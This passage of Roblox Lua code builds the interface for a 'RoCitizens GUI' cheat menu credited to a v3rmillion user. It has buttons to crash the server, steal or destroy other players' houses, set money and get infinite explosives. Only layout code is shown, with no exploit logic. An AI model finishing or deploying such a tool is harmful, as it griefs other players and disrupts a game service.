- SignsText.TextScaled = true
- SignsText.TextSize = 17
- SignsText.TextStrokeTransparency = 0
- SignsText.TextWrapped = true
- Func15.Name = "Func15"
- Func15.Parent = Functions
- Func15.BackgroundColor3 = Color3.new(1, 1, 1)
- Func15.BackgroundTransparency = 1
- Func15.Position = UDim2.new(0, 0, 0, 420)
- Func15.Size = UDim2.new(1, 0, 0, 25)
- Crash.Name = "Crash"
- Crash.Parent = Func15
- Crash.BackgroundColor3 = Color3.new(1, 1, 1)
- Crash.BackgroundTransparency = 1
- Crash.Position = UDim2.new(0, 3, 0, 0)
- Crash.Size = UDim2.new(0, 200, 0, 25)
- Crash.Font = Enum.Font.Bodoni
- Crash.Text = "Crash the Fucking Server:"
- Crash.TextColor3 = Color3.new(0, 0, 0)
- Crash.TextSize = 17
- Crash.TextStrokeColor3 = Color3.new(1, 1, 1)
- Crash.TextStrokeTransparency = 0.69999998807907
- Crash.TextWrapped = true
- Crash.TextXAlignment = Enum.TextXAlignment.Left
- CrashB.Name = "CrashB"
- CrashB.Parent = Func15
- CrashB.BackgroundColor3 = Color3.new(1, 1, 1)
- CrashB.Position = UDim2.new(0, 185, 0, 0)
- CrashB.Size = UDim2.new(0.349999994, 0, 0, 25)
- CrashB.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- CrashB.Font = Enum.Font.ArialBold
- CrashB.Text = "Crash"
- CrashB.TextColor3 = Color3.new(1, 1, 1)
- CrashB.TextSize = 14
- CrashB.TextStrokeTransparency = 0
- Players.Name = "Players"
- Players.Parent = Main
- Players.Active = true
- Players.BackgroundColor3 = Color3.new(0.333333, 0.666667, 1)
- Players.BorderSizePixel = 0
- Players.Position = UDim2.new(1, 25, 0, 50)
- Players.Selectable = true
- Players.Size = UDim2.new(0, 300, 0, 90)
- Title_2.Name = "Title"
- Title_2.Parent = Players
- Title_2.BackgroundColor3 = Color3.new(1, 1, 1)
- Title_2.BackgroundTransparency = 1
- Title_2.Size = UDim2.new(1, 0, 0, 30)
- Title_2.Font = Enum.Font.Bodoni
- Title_2.Text = "Current Selected Player: None"
- Title_2.TextColor3 = Color3.new(0, 0, 0)
- Title_2.TextSize = 17
- Title_2.TextStrokeColor3 = Color3.new(1, 1, 1)
- Title_2.TextStrokeTransparency = 0.69999998807907
- Title_2.TextXAlignment = Enum.TextXAlignment.Left
- Players_2.Name = "Players"
- Players_2.Parent = Players
- Players_2.Active = true
- Players_2.BackgroundColor3 = Color3.new(0.333333, 0.666667, 1)
- Players_2.BackgroundTransparency = 1
- Players_2.BorderSizePixel = 0
- Players_2.Position = UDim2.new(0, 0, 0, 30)
- Players_2.Selectable = true
- Players_2.Size = UDim2.new(1, 0, 1, -60)
- AllPlayers.Name = "AllPlayers"
- AllPlayers.Parent = Players_2
- AllPlayers.BackgroundColor3 = Color3.new(1, 1, 1)
- AllPlayers.Size = UDim2.new(1, 0, 0, 25)
- AllPlayers.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- AllPlayers.Font = Enum.Font.ArialBold
- AllPlayers.Text = "Select all Players"
- AllPlayers.TextColor3 = Color3.new(1, 1, 1)
- AllPlayers.TextSize = 14
- AllPlayers.TextStrokeTransparency = 0
- PlayerBOX.Name = "PlayerBOX"
- PlayerBOX.Parent = Players_2
- PlayerBOX.BackgroundColor3 = Color3.new(0.282353, 0.584314, 0.862745)
- PlayerBOX.BorderColor3 = Color3.new(0, 0, 0)
- PlayerBOX.Position = UDim2.new(0, 5, 0, 30)
- PlayerBOX.Size = UDim2.new(1, -10, 0, 25)
- PlayerBOX.Font = Enum.Font.Arial
- PlayerBOX.Text = "Enter Player Name"
- PlayerBOX.TextColor3 = Color3.new(1, 1, 1)
- PlayerBOX.TextSize = 17
- PlayerBOX.TextStrokeTransparency = 0
- end)
- if not Succ or Obj == nil then
- local RoCitizens = Instance.new("ScreenGui")
- local Main = Instance.new("Frame")
- local Title = Instance.new("TextLabel")
- local MadeBy = Instance.new("TextLabel")
- local Functions = Instance.new("Frame")
- local Func5 = Instance.new("Frame")
- local DestroyLbl = Instance.new("TextLabel")
- local DestroyBut = Instance.new("TextButton")
- local Func4 = Instance.new("Frame")
- local TeleportLbl = Instance.new("TextLabel")
- local Teleport = Instance.new("TextButton")
- local Func3 = Instance.new("Frame")
- local TeleportLbl_2 = Instance.new("TextLabel")
- local Teleport_2 = Instance.new("TextButton")
- local Func2 = Instance.new("Frame")
- local MoneyBox = Instance.new("TextBox")
- local SendMoney = Instance.new("TextButton")
- local SetMoneyLbl = Instance.new("TextLabel")
- local Func1 = Instance.new("Frame")
- local MoneyBox_2 = Instance.new("TextBox")
- local SetMoney = Instance.new("TextButton")
- local SetMoneyLbl_2 = Instance.new("TextLabel")
- local Func7 = Instance.new("Frame")
- local PermsLbl = Instance.new("TextLabel")
- local Permissions = Instance.new("TextButton")
- local Func6 = Instance.new("Frame")
- local AudioChange = Instance.new("TextLabel")
- local Change = Instance.new("TextButton")
- local AudioBox = Instance.new("TextBox")
- local Func8 = Instance.new("Frame")
- local LockpickLbl = Instance.new("TextLabel")
- local Lockpick = Instance.new("TextButton")
- local Func9 = Instance.new("Frame")
- local ExplosivesLbl = Instance.new("TextLabel")
- local Explosives = Instance.new("TextButton")
- local Func10 = Instance.new("Frame")
- local Clothing = Instance.new("TextLabel")
- local Clothes = Instance.new("TextButton")
- local Func11 = Instance.new("Frame")
- local FurnitureLbl = Instance.new("TextLabel")
- local Furniture = Instance.new("TextButton")
- local Func12 = Instance.new("Frame")
- local House = Instance.new("TextLabel")
- local HouseSave = Instance.new("TextButton")
- local HouseName = Instance.new("TextBox")
- local Func16 = Instance.new("Frame")
- local Anti = Instance.new("TextLabel")
- local AntiD = Instance.new("TextButton")
- local Func13 = Instance.new("Frame")
- local House_2 = Instance.new("TextLabel")
- local HouseLoad = Instance.new("TextButton")
- local HouseName_2 = Instance.new("TextBox")
- local Func14 = Instance.new("Frame")
- local Signs = Instance.new("TextLabel")
- local SignsB = Instance.new("TextButton")
- local SignsText = Instance.new("TextBox")
- local Func15 = Instance.new("Frame")
- local Crash = Instance.new("TextLabel")
- local CrashB = Instance.new("TextButton")
- local Players = Instance.new("Frame")
- local Title_2 = Instance.new("TextLabel")
- local Players_2 = Instance.new("Frame")
- local AllPlayers = Instance.new("TextButton")
- local PlayerBOX = Instance.new("TextBox")
- --Properties:
- RoCitizens.Name = "RoCitizens"
- RoCitizens.Parent = game.Workspace.Players.LocalPlayer.PlayerGui
- Main.Name = "Main"
- Main.Parent = RoCitizens
- Main.Active = true
- Main.BackgroundColor3 = Color3.new(0.333333, 0.666667, 1)
- Main.BorderSizePixel = 0
- Main.Draggable = true
- Main.Position = UDim2.new(0.100000001, 0, 0.100000001, 0)
- Main.Selectable = true
- Main.Size = UDim2.new(0, 300, 0, 550)
- Title.Name = "Title"
- Title.Parent = Main
- Title.BackgroundColor3 = Color3.new(1, 1, 1)
- Title.BackgroundTransparency = 1
- Title.Size = UDim2.new(1, 0, 0, 30)
- Title.Font = Enum.Font.Bodoni
- Title.Text = "RoCitizens GUI"
- Title.TextColor3 = Color3.new(0, 0, 0)
- Title.TextSize = 20
- Title.TextStrokeColor3 = Color3.new(1, 1, 1)
- Title.TextStrokeTransparency = 0.69999998807907
- MadeBy.Name = "MadeBy"
- MadeBy.Parent = Main
- MadeBy.BackgroundColor3 = Color3.new(1, 1, 1)
- MadeBy.BackgroundTransparency = 1
- MadeBy.Position = UDim2.new(0, 0, 0, 35)
- MadeBy.Size = UDim2.new(1, 0, 0, 30)
- MadeBy.Font = Enum.Font.Bodoni
- MadeBy.Text = "Made by: FalconPunch @v3rmillion"
- MadeBy.TextColor3 = Color3.new(0, 0, 0)
- MadeBy.TextSize = 20
- MadeBy.TextStrokeColor3 = Color3.new(1, 1, 1)
- MadeBy.TextStrokeTransparency = 0.69999998807907
- Functions.Name = "Functions"
- Functions.Parent = Main
- Functions.Active = true
- Functions.BackgroundColor3 = Color3.new(1, 1, 1)
- Functions.BackgroundTransparency = 1
- Functions.BorderSizePixel = 0
- Functions.Position = UDim2.new(0, 0, 0, 70)
- Functions.Selectable = true
- Functions.Size = UDim2.new(1, 0, 1, -70)
- Func5.Name = "Func5"
- Func5.Parent = Functions
- Func5.BackgroundColor3 = Color3.new(1, 1, 1)
- Func5.BackgroundTransparency = 1
- Func5.Position = UDim2.new(0, 0, 0, 120)
- Func5.Size = UDim2.new(1, 0, 0, 25)
- DestroyLbl.Name = "DestroyLbl"
- DestroyLbl.Parent = Func5
- DestroyLbl.BackgroundColor3 = Color3.new(1, 1, 1)
- DestroyLbl.BackgroundTransparency = 1
- DestroyLbl.Position = UDim2.new(0, 3, 0, 0)
- DestroyLbl.Size = UDim2.new(0, 200, 0, 25)
- DestroyLbl.Font = Enum.Font.Bodoni
- DestroyLbl.Text = "Destroy Selected Player's House"
- DestroyLbl.TextColor3 = Color3.new(0, 0, 0)
- DestroyLbl.TextSize = 15
- DestroyLbl.TextStrokeColor3 = Color3.new(1, 1, 1)
- DestroyLbl.TextStrokeTransparency = 0.69999998807907
- DestroyLbl.TextWrapped = true
- DestroyLbl.TextXAlignment = Enum.TextXAlignment.Left
- DestroyBut.Name = "DestroyBut"
- DestroyBut.Parent = Func5
- DestroyBut.BackgroundColor3 = Color3.new(1, 1, 1)
- DestroyBut.Position = UDim2.new(0, 200, 0, 0)
- DestroyBut.Size = UDim2.new(0.300000012, 0, 0, 25)
- DestroyBut.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- DestroyBut.Font = Enum.Font.ArialBold
- DestroyBut.Text = "Destroy"
- DestroyBut.TextColor3 = Color3.new(1, 1, 1)
- DestroyBut.TextSize = 14
- DestroyBut.TextStrokeTransparency = 0
- Func4.Name = "Func4"
- Func4.Parent = Functions
- Func4.BackgroundColor3 = Color3.new(1, 1, 1)
- Func4.BackgroundTransparency = 1
- Func4.Position = UDim2.new(0, 0, 0, 90)
- Func4.Size = UDim2.new(1, 0, 0, 25)
- TeleportLbl.Name = "TeleportLbl"
- TeleportLbl.Parent = Func4
- TeleportLbl.BackgroundColor3 = Color3.new(1, 1, 1)
- TeleportLbl.BackgroundTransparency = 1
- TeleportLbl.Position = UDim2.new(0, 3, 0, 0)
- TeleportLbl.Size = UDim2.new(0, 200, 0, 25)
- TeleportLbl.Font = Enum.Font.Bodoni
- TeleportLbl.Text = "Steal Selected Player's House"
- TeleportLbl.TextColor3 = Color3.new(0, 0, 0)
- TeleportLbl.TextSize = 17
- TeleportLbl.TextStrokeColor3 = Color3.new(1, 1, 1)
- TeleportLbl.TextStrokeTransparency = 0.69999998807907
- TeleportLbl.TextWrapped = true
- TeleportLbl.TextXAlignment = Enum.TextXAlignment.Left
- Teleport.Name = "Teleport"
- Teleport.Parent = Func4
- Teleport.BackgroundColor3 = Color3.new(1, 1, 1)
- Teleport.Position = UDim2.new(0, 200, 0, 0)
- Teleport.Size = UDim2.new(0.300000012, 0, 0, 25)
- Teleport.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- Teleport.Font = Enum.Font.ArialBold
- Teleport.Text = "Steal"
- Teleport.TextColor3 = Color3.new(1, 1, 1)
- Teleport.TextSize = 14
- Teleport.TextStrokeTransparency = 0
- Func3.Name = "Func3"
- Func3.Parent = Functions
- Func3.BackgroundColor3 = Color3.new(1, 1, 1)
- Func3.BackgroundTransparency = 1
- Func3.Position = UDim2.new(0, 0, 0, 60)
- Func3.Size = UDim2.new(1, 0, 0, 25)
- TeleportLbl_2.Name = "TeleportLbl"
- TeleportLbl_2.Parent = Func3
- TeleportLbl_2.BackgroundColor3 = Color3.new(1, 1, 1)
- TeleportLbl_2.BackgroundTransparency = 1
- TeleportLbl_2.Position = UDim2.new(0, 3, 0, 0)
- TeleportLbl_2.Size = UDim2.new(0, 200, 0, 25)
- TeleportLbl_2.Font = Enum.Font.Bodoni
- TeleportLbl_2.Text = "Teleport to Selected Player"
- TeleportLbl_2.TextColor3 = Color3.new(0, 0, 0)
- TeleportLbl_2.TextSize = 17
- TeleportLbl_2.TextStrokeColor3 = Color3.new(1, 1, 1)
- TeleportLbl_2.TextStrokeTransparency = 0.69999998807907
- TeleportLbl_2.TextWrapped = true
- TeleportLbl_2.TextXAlignment = Enum.TextXAlignment.Left
- Teleport_2.Name = "Teleport"
- Teleport_2.Parent = Func3
- Teleport_2.BackgroundColor3 = Color3.new(1, 1, 1)
- Teleport_2.Position = UDim2.new(0, 185, 0, 0)
- Teleport_2.Size = UDim2.new(0.349999994, 0, 0, 25)
- Teleport_2.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- Teleport_2.Font = Enum.Font.ArialBold
- Teleport_2.Text = "Teleport"
- Teleport_2.TextColor3 = Color3.new(1, 1, 1)
- Teleport_2.TextSize = 14
- Teleport_2.TextStrokeTransparency = 0
- Func2.Name = "Func2"
- Func2.Parent = Functions
- Func2.BackgroundColor3 = Color3.new(1, 1, 1)
- Func2.BackgroundTransparency = 1
- Func2.Position = UDim2.new(0, 0, 0, 30)
- Func2.Size = UDim2.new(1, 0, 0, 25)
- MoneyBox.Name = "MoneyBox"
- MoneyBox.Parent = Func2
- MoneyBox.BackgroundColor3 = Color3.new(0.282353, 0.584314, 0.862745)
- MoneyBox.BorderColor3 = Color3.new(0, 0, 0)
- MoneyBox.Position = UDim2.new(0, 95, 0, 0)
- MoneyBox.Size = UDim2.new(0, 125, 0, 25)
- MoneyBox.Font = Enum.Font.Arial
- MoneyBox.Text = "$2,147,483,647"
- MoneyBox.TextColor3 = Color3.new(1, 1, 1)
- MoneyBox.TextSize = 17
- MoneyBox.TextStrokeTransparency = 0
- SendMoney.Name = "SendMoney"
- SendMoney.Parent = Func2
- SendMoney.BackgroundColor3 = Color3.new(1, 1, 1)
- SendMoney.Position = UDim2.new(0, 225, 0, 0)
- SendMoney.Size = UDim2.new(0, 73, 0, 25)
- SendMoney.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- SendMoney.Font = Enum.Font.ArialBold
- SendMoney.Text = "Send"
- SendMoney.TextColor3 = Color3.new(1, 1, 1)
- SendMoney.TextSize = 14
- SendMoney.TextStrokeTransparency = 0
- SetMoneyLbl.Name = "SetMoneyLbl"
- SetMoneyLbl.Parent = Func2
- SetMoneyLbl.BackgroundColor3 = Color3.new(1, 1, 1)
- SetMoneyLbl.BackgroundTransparency = 1
- SetMoneyLbl.Position = UDim2.new(0, 3, 0, 0)
- SetMoneyLbl.Size = UDim2.new(0, 200, 0, 25)
- SetMoneyLbl.Font = Enum.Font.Bodoni
- SetMoneyLbl.Text = "Send Money:"
- SetMoneyLbl.TextColor3 = Color3.new(0, 0, 0)
- SetMoneyLbl.TextSize = 17
- SetMoneyLbl.TextStrokeColor3 = Color3.new(1, 1, 1)
- SetMoneyLbl.TextStrokeTransparency = 0.69999998807907
- SetMoneyLbl.TextWrapped = true
- SetMoneyLbl.TextXAlignment = Enum.TextXAlignment.Left
- Func1.Name = "Func1"
- Func1.Parent = Functions
- Func1.BackgroundColor3 = Color3.new(1, 1, 1)
- Func1.BackgroundTransparency = 1
- Func1.Size = UDim2.new(1, 0, 0, 25)
- MoneyBox_2.Name = "MoneyBox"
- MoneyBox_2.Parent = Func1
- MoneyBox_2.BackgroundColor3 = Color3.new(0.282353, 0.584314, 0.862745)
- MoneyBox_2.BorderColor3 = Color3.new(0, 0, 0)
- MoneyBox_2.Position = UDim2.new(0, 85, 0, 0)
- MoneyBox_2.Size = UDim2.new(0, 125, 0, 25)
- MoneyBox_2.Font = Enum.Font.Arial
- MoneyBox_2.Text = "$2,147,483,647"
- MoneyBox_2.TextColor3 = Color3.new(1, 1, 1)
- MoneyBox_2.TextSize = 17
- MoneyBox_2.TextStrokeTransparency = 0
- SetMoney.Name = "SetMoney"
- SetMoney.Parent = Func1
- SetMoney.BackgroundColor3 = Color3.new(1, 1, 1)
- SetMoney.Position = UDim2.new(0, 215, 0, 0)
- SetMoney.Size = UDim2.new(0, 75, 0, 25)
- SetMoney.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- SetMoney.Font = Enum.Font.ArialBold
- SetMoney.Text = "Set"
- SetMoney.TextColor3 = Color3.new(1, 1, 1)
- SetMoney.TextSize = 14
- SetMoney.TextStrokeTransparency = 0
- SetMoneyLbl_2.Name = "SetMoneyLbl"
- SetMoneyLbl_2.Parent = Func1
- SetMoneyLbl_2.BackgroundColor3 = Color3.new(1, 1, 1)
- SetMoneyLbl_2.BackgroundTransparency = 1
- SetMoneyLbl_2.Position = UDim2.new(0, 3, 0, 0)
- SetMoneyLbl_2.Size = UDim2.new(0, 200, 0, 25)
- SetMoneyLbl_2.Font = Enum.Font.Bodoni
- SetMoneyLbl_2.Text = "Set Money:"
- SetMoneyLbl_2.TextColor3 = Color3.new(0, 0, 0)
- SetMoneyLbl_2.TextSize = 17
- SetMoneyLbl_2.TextStrokeColor3 = Color3.new(1, 1, 1)
- SetMoneyLbl_2.TextStrokeTransparency = 0.69999998807907
- SetMoneyLbl_2.TextWrapped = true
- SetMoneyLbl_2.TextXAlignment = Enum.TextXAlignment.Left
- Func7.Name = "Func7"
- Func7.Parent = Functions
- Func7.BackgroundColor3 = Color3.new(1, 1, 1)
- Func7.BackgroundTransparency = 1
- Func7.Position = UDim2.new(0, 0, 0, 180)
- Func7.Size = UDim2.new(1, 0, 0, 25)
- PermsLbl.Name = "PermsLbl"
- PermsLbl.Parent = Func7
- PermsLbl.BackgroundColor3 = Color3.new(1, 1, 1)
- PermsLbl.BackgroundTransparency = 1
- PermsLbl.Position = UDim2.new(0, 3, 0, 0)
- PermsLbl.Size = UDim2.new(0, 200, 0, 25)
- PermsLbl.Font = Enum.Font.Bodoni
- PermsLbl.Text = "House Permissions"
- PermsLbl.TextColor3 = Color3.new(0, 0, 0)
- PermsLbl.TextSize = 17
- PermsLbl.TextStrokeColor3 = Color3.new(1, 1, 1)
- PermsLbl.TextStrokeTransparency = 0.69999998807907
- PermsLbl.TextWrapped = true
- PermsLbl.TextXAlignment = Enum.TextXAlignment.Left
- Permissions.Name = "Permissions"
- Permissions.Parent = Func7
- Permissions.BackgroundColor3 = Color3.new(1, 1, 1)
- Permissions.Position = UDim2.new(0, 135, 0, 0)
- Permissions.Size = UDim2.new(0.519999981, 0, 0, 25)
- Permissions.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- Permissions.Font = Enum.Font.ArialBold
- Permissions.Text = "OFF"
- Permissions.TextColor3 = Color3.new(1, 0, 0)
- Permissions.TextSize = 14
- Permissions.TextStrokeTransparency = 0.5
- Func6.Name = "Func6"
- Func6.Parent = Functions
- Func6.BackgroundColor3 = Color3.new(1, 1, 1)
- Func6.BackgroundTransparency = 1
- Func6.Position = UDim2.new(0, 0, 0, 150)
- Func6.Size = UDim2.new(1, 0, 0, 25)
- AudioChange.Name = "AudioChange"
- AudioChange.Parent = Func6
- AudioChange.BackgroundColor3 = Color3.new(1, 1, 1)
- AudioChange.BackgroundTransparency = 1
- AudioChange.Position = UDim2.new(0, 3, 0, 0)
- AudioChange.Size = UDim2.new(0, 200, 0, 25)
- AudioChange.Font = Enum.Font.Bodoni
- AudioChange.Text = "Change All Audio"
- AudioChange.TextColor3 = Color3.new(0, 0, 0)
- AudioChange.TextSize = 17
- AudioChange.TextStrokeColor3 = Color3.new(1, 1, 1)
- AudioChange.TextStrokeTransparency = 0.69999998807907
- AudioChange.TextWrapped = true
- AudioChange.TextXAlignment = Enum.TextXAlignment.Left
- Change.Name = "Change"
- Change.Parent = Func6
- Change.BackgroundColor3 = Color3.new(1, 1, 1)
- Change.Position = UDim2.new(0, 215, 0, 0)
- Change.Size = UDim2.new(0.25, 0, 0, 25)
- Change.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- Change.Font = Enum.Font.ArialBold
- Change.Text = "Change"
- Change.TextColor3 = Color3.new(1, 1, 1)
- Change.TextSize = 14
- Change.TextStrokeTransparency = 0
- AudioBox.Name = "AudioBox"
- AudioBox.Parent = Func6
- AudioBox.BackgroundColor3 = Color3.new(0.282353, 0.584314, 0.862745)
- AudioBox.BorderColor3 = Color3.new(0, 0, 0)
- AudioBox.Position = UDim2.new(0, 120, 0, 0)
- AudioBox.Size = UDim2.new(0, 90, 0, 25)
- AudioBox.Font = Enum.Font.Arial
- AudioBox.Text = "856173428"
- AudioBox.TextColor3 = Color3.new(1, 1, 1)
- AudioBox.TextSize = 17
- AudioBox.TextStrokeTransparency = 0
- Func8.Name = "Func8"
- Func8.Parent = Functions
- Func8.BackgroundColor3 = Color3.new(1, 1, 1)
- Func8.BackgroundTransparency = 1
- Func8.Position = UDim2.new(0, 0, 0, 210)
- Func8.Size = UDim2.new(1, 0, 0, 25)
- LockpickLbl.Name = "LockpickLbl"
- LockpickLbl.Parent = Func8
- LockpickLbl.BackgroundColor3 = Color3.new(1, 1, 1)
- LockpickLbl.BackgroundTransparency = 1
- LockpickLbl.Position = UDim2.new(0, 3, 0, 0)
- LockpickLbl.Size = UDim2.new(0, 200, 0, 25)
- LockpickLbl.Font = Enum.Font.Bodoni
- LockpickLbl.Text = "Infinite Lockpicks"
- LockpickLbl.TextColor3 = Color3.new(0, 0, 0)
- LockpickLbl.TextSize = 17
- LockpickLbl.TextStrokeColor3 = Color3.new(1, 1, 1)
- LockpickLbl.TextStrokeTransparency = 0.69999998807907
- LockpickLbl.TextWrapped = true
- LockpickLbl.TextXAlignment = Enum.TextXAlignment.Left
- Lockpick.Name = "Lockpick"
- Lockpick.Parent = Func8
- Lockpick.BackgroundColor3 = Color3.new(1, 1, 1)
- Lockpick.Position = UDim2.new(0, 135, 0, 0)
- Lockpick.Size = UDim2.new(0.519999981, 0, 0, 25)
- Lockpick.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- Lockpick.Font = Enum.Font.ArialBold
- Lockpick.Text = "OFF"
- Lockpick.TextColor3 = Color3.new(1, 0, 0)
- Lockpick.TextSize = 14
- Lockpick.TextStrokeTransparency = 0.5
- Func9.Name = "Func9"
- Func9.Parent = Functions
- Func9.BackgroundColor3 = Color3.new(1, 1, 1)
- Func9.BackgroundTransparency = 1
- Func9.Position = UDim2.new(0, 0, 0, 240)
- Func9.Size = UDim2.new(1, 0, 0, 25)
- ExplosivesLbl.Name = "ExplosivesLbl"
- ExplosivesLbl.Parent = Func9
- ExplosivesLbl.BackgroundColor3 = Color3.new(1, 1, 1)
- ExplosivesLbl.BackgroundTransparency = 1
- ExplosivesLbl.Position = UDim2.new(0, 3, 0, 0)
- ExplosivesLbl.Size = UDim2.new(0, 200, 0, 25)
- ExplosivesLbl.Font = Enum.Font.Bodoni
- ExplosivesLbl.Text = "Infinite Explosives"
- ExplosivesLbl.TextColor3 = Color3.new(0, 0, 0)
- ExplosivesLbl.TextSize = 17
- ExplosivesLbl.TextStrokeColor3 = Color3.new(1, 1, 1)
- ExplosivesLbl.TextStrokeTransparency = 0.69999998807907
- ExplosivesLbl.TextWrapped = true
- ExplosivesLbl.TextXAlignment = Enum.TextXAlignment.Left
- Explosives.Name = "Explosives"
- Explosives.Parent = Func9
- Explosives.BackgroundColor3 = Color3.new(1, 1, 1)
- Explosives.Position = UDim2.new(0, 135, 0, 0)
- Explosives.Size = UDim2.new(0.519999981, 0, 0, 25)
- Explosives.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- Explosives.Font = Enum.Font.ArialBold
- Explosives.Text = "OFF"
- Explosives.TextColor3 = Color3.new(1, 0, 0)
- Explosives.TextSize = 14
- Explosives.TextStrokeTransparency = 0.5
- Func10.Name = "Func10"
- Func10.Parent = Functions
- Func10.BackgroundColor3 = Color3.new(1, 1, 1)
- Func10.BackgroundTransparency = 1
- Func10.Position = UDim2.new(0, 0, 0, 270)
- Func10.Size = UDim2.new(1, 0, 0, 25)
- Clothing.Name = "Clothing"
- Clothing.Parent = Func10
- Clothing.BackgroundColor3 = Color3.new(1, 1, 1)
- Clothing.BackgroundTransparency = 1
- Clothing.Position = UDim2.new(0, 3, 0, 0)
- Clothing.Size = UDim2.new(0, 200, 0, 25)
- Clothing.Font = Enum.Font.Bodoni
- Clothing.Text = "Add All Clothing"
- Clothing.TextColor3 = Color3.new(0, 0, 0)
- Clothing.TextSize = 17
- Clothing.TextStrokeColor3 = Color3.new(1, 1, 1)
- Clothing.TextStrokeTransparency = 0.69999998807907
- Clothing.TextWrapped = true
- Clothing.TextXAlignment = Enum.TextXAlignment.Left
- Clothes.Name = "Clothes"
- Clothes.Parent = Func10
- Clothes.BackgroundColor3 = Color3.new(1, 1, 1)
- Clothes.Position = UDim2.new(0, 135, 0, 0)
- Clothes.Size = UDim2.new(0.519999981, 0, 0, 25)
- Clothes.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- Clothes.Font = Enum.Font.ArialBold
- Clothes.Text = "Add"
- Clothes.TextColor3 = Color3.new(1, 1, 1)
- Clothes.TextSize = 14
- Clothes.TextStrokeTransparency = 0
- Func11.Name = "Func11"
- Func11.Parent = Functions
- Func11.BackgroundColor3 = Color3.new(1, 1, 1)
- Func11.BackgroundTransparency = 1
- Func11.Position = UDim2.new(0, 0, 0, 300)
- Func11.Size = UDim2.new(1, 0, 0, 25)
- FurnitureLbl.Name = "FurnitureLbl"
- FurnitureLbl.Parent = Func11
- FurnitureLbl.BackgroundColor3 = Color3.new(1, 1, 1)
- FurnitureLbl.BackgroundTransparency = 1
- FurnitureLbl.Position = UDim2.new(0, 3, 0, 0)
- FurnitureLbl.Size = UDim2.new(0, 200, 0, 25)
- FurnitureLbl.Font = Enum.Font.Bodoni
- FurnitureLbl.Text = "Add All Furniture"
- FurnitureLbl.TextColor3 = Color3.new(0, 0, 0)
- FurnitureLbl.TextSize = 17
- FurnitureLbl.TextStrokeColor3 = Color3.new(1, 1, 1)
- FurnitureLbl.TextStrokeTransparency = 0.69999998807907
- FurnitureLbl.TextWrapped = true
- FurnitureLbl.TextXAlignment = Enum.TextXAlignment.Left
- Furniture.Name = "Furniture"
- Furniture.Parent = Func11
- Furniture.BackgroundColor3 = Color3.new(1, 1, 1)
- Furniture.Position = UDim2.new(0, 135, 0, 0)
- Furniture.Size = UDim2.new(0.519999981, 0, 0, 25)
- Furniture.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- Furniture.Font = Enum.Font.ArialBold
- Furniture.Text = "Add"
- Furniture.TextColor3 = Color3.new(1, 1, 1)
- Furniture.TextSize = 14
- Furniture.TextStrokeTransparency = 0
- Func12.Name = "Func12"
- Func12.Parent = Functions
- Func12.BackgroundColor3 = Color3.new(1, 1, 1)
- Func12.BackgroundTransparency = 1
- Func12.Position = UDim2.new(0, 0, 0, 330)
- Func12.Size = UDim2.new(1, 0, 0, 25)
- House.Name = "House"
- House.Parent = Func12
- House.BackgroundColor3 = Color3.new(1, 1, 1)
- House.BackgroundTransparency = 1
- House.Position = UDim2.new(0, 3, 0, 0)
- House.Size = UDim2.new(0, 200, 0, 25)
- House.Font = Enum.Font.Bodoni
- House.Text = "Save House:"
- House.TextColor3 = Color3.new(0, 0, 0)
- House.TextSize = 17
- House.TextStrokeColor3 = Color3.new(1, 1, 1)
- House.TextStrokeTransparency = 0.69999998807907
- House.TextWrapped = true
- House.TextXAlignment = Enum.TextXAlignment.Left
- HouseSave.Name = "HouseSave"
- HouseSave.Parent = Func12
- HouseSave.BackgroundColor3 = Color3.new(1, 1, 1)
- HouseSave.Position = UDim2.new(0, 215, 0, 0)
- HouseSave.Size = UDim2.new(0.25, 0, 0, 25)
- HouseSave.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- HouseSave.Font = Enum.Font.ArialBold
- HouseSave.Text = "Save"
- HouseSave.TextColor3 = Color3.new(1, 1, 1)
- HouseSave.TextSize = 14
- HouseSave.TextStrokeTransparency = 0
- HouseName.Name = "HouseName"
- HouseName.Parent = Func12
- HouseName.BackgroundColor3 = Color3.new(0.282353, 0.584314, 0.862745)
- HouseName.BorderColor3 = Color3.new(0, 0, 0)
- HouseName.Position = UDim2.new(0, 90, 0, 0)
- HouseName.Size = UDim2.new(0, 120, 0, 25)
- HouseName.Font = Enum.Font.Arial
- HouseName.Text = "House 1"
- HouseName.TextColor3 = Color3.new(1, 1, 1)
- HouseName.TextSize = 17
- HouseName.TextStrokeTransparency = 0
- Func16.Name = "Func16"
- Func16.Parent = Functions
- Func16.BackgroundColor3 = Color3.new(1, 1, 1)
- Func16.BackgroundTransparency = 1
- Func16.Position = UDim2.new(0, 0, 0, 450)
- Func16.Size = UDim2.new(1, 0, 0, 25)
- Anti.Name = "Anti"
- Anti.Parent = Func16
- Anti.BackgroundColor3 = Color3.new(1, 1, 1)
- Anti.BackgroundTransparency = 1
- Anti.Position = UDim2.new(0, 3, 0, 0)
- Anti.Size = UDim2.new(0, 200, 0, 25)
- Anti.Font = Enum.Font.Bodoni
- Anti.Text = "Anti - House Destroy"
- Anti.TextColor3 = Color3.new(0, 0, 0)
- Anti.TextSize = 17
- Anti.TextStrokeColor3 = Color3.new(1, 1, 1)
- Anti.TextStrokeTransparency = 0.69999998807907
- Anti.TextWrapped = true
- Anti.TextXAlignment = Enum.TextXAlignment.Left
- AntiD.Name = "AntiD"
- AntiD.Parent = Func16
- AntiD.BackgroundColor3 = Color3.new(1, 1, 1)
- AntiD.Position = UDim2.new(0, 150, 0, 0)
- AntiD.Size = UDim2.new(0.469999999, 0, 0, 25)
- AntiD.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- AntiD.Font = Enum.Font.ArialBold
- AntiD.Text = "OFF"
- AntiD.TextColor3 = Color3.new(1, 0, 0)
- AntiD.TextSize = 14
- AntiD.TextStrokeTransparency = 0.5
- Func13.Name = "Func13"
- Func13.Parent = Functions
- Func13.BackgroundColor3 = Color3.new(1, 1, 1)
